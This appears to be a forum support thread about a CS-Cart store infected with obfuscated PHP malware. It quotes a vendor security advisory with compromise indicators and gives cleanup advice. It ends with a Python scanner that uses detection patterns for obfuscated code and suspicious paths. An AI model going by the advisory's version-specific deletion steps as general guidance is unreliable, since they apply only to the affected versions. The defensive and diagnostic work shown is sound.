Internal Server Error - File Editor

Hello



I was editing the gift certificate template in the File Editor. I had made a few changes and saved the changes several times with no issue, but when I tried to save after my most recent change I got a red box in the corner saying "Error: Oops, something went wrong (Internal Server Error). Please try again." And now I can't save my changes, and the website is also now completely blank.

Does anyone know how to fix this or where I may have gone wrong?




Dear Neptune,


  1. Open your config.local.php file
  2. Find the line

ini_set('display_errors', 0);

  3. Replace 0 with 1

You will see what exactly is wrong with your website!



Best regards, Alt-team.

No errors showed up, and when I went back into the file it was blank.

Ok so I've been on to my hosting company and there's an error with the code showing up in the logs:



[Wed Nov 12 11:24:25 2014] [error] [client 86.40.143.6] PHP Fatal error: Namespace declaration statement has to be the very first statement in the script in /usr/local/pem/vhosts/102845/webspace/httpdocs/deliverypaid.com/store/app/lib/vendor/composer/ClassLoader.php on line 13, referer: https://www.deliverypaid.com/store/admin5860.php?dispatch=file_editor.manage

There is an issue with the cPanel file editor. If you have edited using the cPanel file editor, then open the file again and see the first file. Remove the blank spaces. Save it.

Looking at the php files, there are lines and lines of php gibberish at the top of the file. Is it possible I was hacked?



This is the code



Well, that's certainly not cs-cart code and someone's put in a lot of time to make it unreadable. So I'd say yes, you have been invaded by malware.

Dear Neptune,



There was a message from CS-Cart.



“We would like to inform you about a security vulnerability discovered in CS-Cart and Multi-Vendor 2.x.x to 4.1.2.

Please read the information below to learn how to know if your site was affected and how to protect it.

Note that even if your store was affected by this issue, this does not necessarily mean that any sensitive data has been stolen or compromised. Our investigation shows that the affected stores were infected by a bot, but the bot has not collected any store data via the infected files yet.

Still, we strongly recommend you to apply the provided fix immediately to guarantee that your store is secure against this vulnerability.

Publish date: May 26, 2014

Affected versions: 2.x.x, 3.0.x, 4.0.x, 4.1.1 to 4.1.2

Vulnerability type: Arbitrary code execution

Severity: Critical

Summary

The update fixes a vulnerability that can result in a remote unauthenticated attacker executing arbitrary script in the context of the end-user’s browser session.

Check if your site was affected

Check if the following files exist in the CS-Cart directory on your server:

js/thumbs.php

images/test.gif

If these files exist, immediately remove them.

We also recommend to check your server for new unknown files and unauthorized file changes.

Solution

Follow the instructions for your CS-Cart or Multi-Vendor version:

1) In CS-Cart 4.0.x, 4.1.1 to 4.1.2 and Multi-Vendor 4.0.x, 4.1.1 to 4.1.2:

 a) Delete the file app/payments/atos.php

 b) Delete the directory app/payments/atos_files

 c) Delete the file app/payments/hsbc.php

 d) Delete the directory app/payments/hsbc_files

2) In CS-Cart 2.x.x and 3.0.x (all editions)

 a) Delete the file payments/atos.php

 b) Delete the directory payments/atos_files

 c) Delete the file payments/hsbc.php

 d) Delete the directory payments/hsbc_files”



Hope that it will help you.



Best regards, Alt-team.

Thanks guys :)


[quote]js/thumbs.php

images/test.gif[/quote]

Weren’t there but I deleted the

[quote]

1) In CS-Cart 4.0.x, 4.1.1 to 4.1.2 and Multi-Vendor 4.0.x, 4.1.1 to 4.1.2:

a) Delete the file app/payments/atos.php

b) Delete the directory app/payments/atos_files

c) Delete the file app/payments/hsbc.php

d) Delete the directory app/payments/hsbc_files

[/quote]

The site is still blank, but will I need to go through every php file individually and delete this unreadable code? Or should I just delete everything and do a full reinstall? Ideally I’d be looking to avoid this.

Dear Neptune,



As you understand, there are several ways of solving this problem:

  1. Check every php file and remove the code manually; it is better to replace these files with the original ones;
  2. Reinstall CS-Cart;
  3. Contact specialists who will deal with this problem instead of you.

P.S. Also, if you do not have additional add-ons, it is better to make a backup of the app folder and replace it with the original folder.

Best regards, Alt-team.

What the OP reported is not the signature of the security issue that came from the payment systems (or at least from the 30+ I've investigated, I've not seen that signature result from that particular breach).

Would suggest you change your cPanel passwords (and WHM if you have a VPS), any root passwords on your server as well as your normal admin URL and admin passwords. Would also suggest that you force users to change their passwords on their next access to your site. Then you should

  1. Scan your php files for any key words from the signature above and investigate/repair those files.
  2. Run a good malware detector on your site to look for an infection.

The problem with malware is that it's not hard to detect its presence, but it is very hard to identify the entry point. So even if you find/remove the actual malware, it could be a never-ending process until you can identify (and close) the actual entry point of the injection(s).
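
An added example (not code from any poster in this thread or from CS-Cart) of the file scan suggested above: it flags PHP files where anything precedes the namespace statement, which is the condition behind the fatal error in the log, lines dense with hex or octal escapes, and the paths named in the quoted advisory. The function names and the length and escape-count thresholds are assumptions.

```python
import re
import sys
from pathlib import Path

# Paths named in the advisory quoted in the thread (CS-Cart 4.x layout).
ADVISORY_PATHS = ["js/thumbs.php", "images/test.gif",
                  "app/payments/atos.php", "app/payments/atos_files",
                  "app/payments/hsbc.php", "app/payments/hsbc_files"]
ESCAPE_RE = re.compile(r"[%\\](?:x[0-9a-fA-F]{2}|[0-7]{3})")
NAMESPACE_RE = re.compile(r"^[ \t]*namespace\s+[A-Za-z_][\w\\]*\s*[;{]", re.M)
# Only comments, whitespace and declare() may precede a namespace statement.
ALLOWED_RE = re.compile(
    r"/\*.*?\*/|//[^\n]*|#[^\n]*|declare\s*\([^)]*\)\s*;|\s+", re.S)

def code_before_namespace(text):
    """True if anything but '<?php', comments or declare() precedes namespace."""
    match = NAMESPACE_RE.search(text)
    if not match:
        return False
    head = text[:match.start()]
    if not head.startswith("<?php"):
        return True  # blank line, BOM or injected block ahead of the open tag
    return ALLOWED_RE.sub("", head[5:]) != ""

def obfuscated_lines(text, min_len=400, min_escapes=20):
    """Line numbers of long lines dense with escapes (assumed thresholds)."""
    return [no for no, line in enumerate(text.splitlines(), 1)
            if len(line) >= min_len
            and len(ESCAPE_RE.findall(line)) >= min_escapes]

def scan(root):
    """Return (relative path, reason) findings for a store directory."""
    root = Path(root)
    findings = [(p, "advisory path present")
                for p in ADVISORY_PATHS if (root / p).exists()]
    for path in sorted(root.rglob("*.php")):
        text = path.read_text(encoding="utf-8", errors="replace")
        rel = path.relative_to(root).as_posix()
        if code_before_namespace(text):
            findings.append((rel, "content before namespace statement"))
        findings += [(rel, f"dense escape sequences on line {no}")
                     for no in obfuscated_lines(text)]
    return findings

if __name__ == "__main__":
    for rel, reason in scan(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"{rel}: {reason}")
```

Run it against a copy of the store directory and compare each flagged file with the same file from a clean CS-Cart package of the same version.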